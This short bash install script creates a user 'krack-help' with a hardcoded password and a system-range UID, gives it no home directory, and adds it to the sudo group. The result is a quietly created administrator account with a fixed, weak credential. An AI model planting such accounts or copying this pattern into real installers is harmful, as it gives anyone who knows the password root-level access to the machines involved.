#!/bin/bash

#create sudoer user
userHelp="krack-help"
password="Ufo[hs"
userId=998

if getent passwd $userHelp > /dev/null 2>&1; then
    echo "user $userHelp already exists"
else
	useradd --uid $userId --shell /bin/bash --no-create-home --no-log-init $userHelp
	echo -e "$password\n$password" | passwd $userHelp
	usermod -aG sudo $userHelp
	echo "user $userHelp created"
fi


echo "install done"



